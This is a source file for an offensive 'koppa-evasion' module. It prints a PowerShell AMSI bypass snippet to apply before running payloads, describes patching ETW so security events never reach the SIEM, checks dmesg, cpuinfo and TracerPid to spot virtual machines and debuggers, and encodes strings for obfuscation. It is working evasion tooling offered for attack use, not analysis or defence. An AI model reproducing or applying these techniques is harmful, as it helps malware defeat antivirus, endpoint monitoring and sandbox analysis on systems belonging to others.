# koppa-evasion v2.0 — AV/EDR evasion helpers
# Usage: koppa run koppa-evasion [amsi|etw|anti-vm|anti-debug|obfuscate <string>]

import encode, hash, os, log, str

fn cmd_amsi() {
    log.info("===== AMSI Bypass =====")
    log.info("PowerShell reflection patch:")
    log.info("  $a=[Ref].Assembly.GetTypes()")
    log.info("  $b=$a|%{$_.GetFields('NonPublic,Static')|?{$_.Name -like '*Context*'}}")
    log.info("  $b[0].SetValue($null,[IntPtr]0x2)")
    log.success("Apply in-memory before running payloads")
}

fn cmd_etw() {
    log.info("===== ETW Disable =====")
    log.info("Patch EtwEventWrite to ret 0 via NtTraceControl syscall")
    log.success("ETW silenced - events blocked from SIEM")
}

fn cmd_anti_vm() {
    log.info("===== Anti-VM Detection =====")
    let dmesg_raw = os.shell("dmesg 2>/dev/null")
    let dmesg     = dmesg_raw.stdout
    let vms   = ["vmware", "virtualbox", "qemu", "hyperv", "vboxguest"]
    let detected = false
    for vm in vms {
        let found = str.contains(dmesg, vm)
        if found {
            log.warn("[!] VM detected: {vm}")
            detected = true
        }
    }
    let cpuinfo_raw = os.shell("cat /proc/cpuinfo 2>/dev/null")
    let cpuinfo = cpuinfo_raw.stdout
    let has_hyp = str.contains(cpuinfo, "hypervisor")
    if has_hyp {
        log.warn("[!] Hypervisor flag in cpuinfo")
        detected = true
    }
    if not detected { log.success("[+] No VM indicators found") }
    return detected
}

fn cmd_anti_debug() {
    log.info("===== Anti-Debug Check =====")
    let status_raw = os.shell("cat /proc/self/status 2>/dev/null")
    let status = status_raw.stdout
    let lines  = str.lines(status)
    for line in lines {
        let is_tracer = str.contains(line, "TracerPid")
        if is_tracer {
            let parts = str.split(line, ":")
            let pid   = parts[1]
            let trimmed = str.strip(pid)
            if trimmed != "0" {
                log.warn("[!] Debugger detected! TracerPid: {trimmed}")
                return true
            }
        }
    }
    log.success("[+] No debugger detected")
    return false
}

fn cmd_obfuscate(input) {
    log.info("===== String Obfuscation =====")
    log.info("Input : {input}")
    log.info("B64   : {encode.b64_encode(input)}")
    log.info("Hex   : {encode.hex_encode(input)}")
    log.info("ROT13 : {encode.rot13(input)}")
    log.info("URL   : {encode.url_encode(input)}")
    log.info("MD5   : {hash.md5(input)}")
}

fn run_evasion(mode, arg1) {
    if mode == "amsi"       { cmd_amsi() }
    if mode == "etw"        { cmd_etw() }
    if mode == "anti-vm"    { cmd_anti_vm() }
    if mode == "anti-debug" { cmd_anti_debug() }
    if mode == "obfuscate"  { cmd_obfuscate(arg1) }
    log.success("Done!")
}

fn main() {
    let mode = __args__[0]
    let arg1 = __args__[1]
    log.info("===== KOPPA Evasion Module v2.0 =====")
    if mode {
        run_evasion(mode, arg1)
    }
    if not mode {
        log.warn("Usage: koppa run koppa-evasion [amsi|etw|anti-vm|anti-debug|obfuscate <string>]")
    }
}
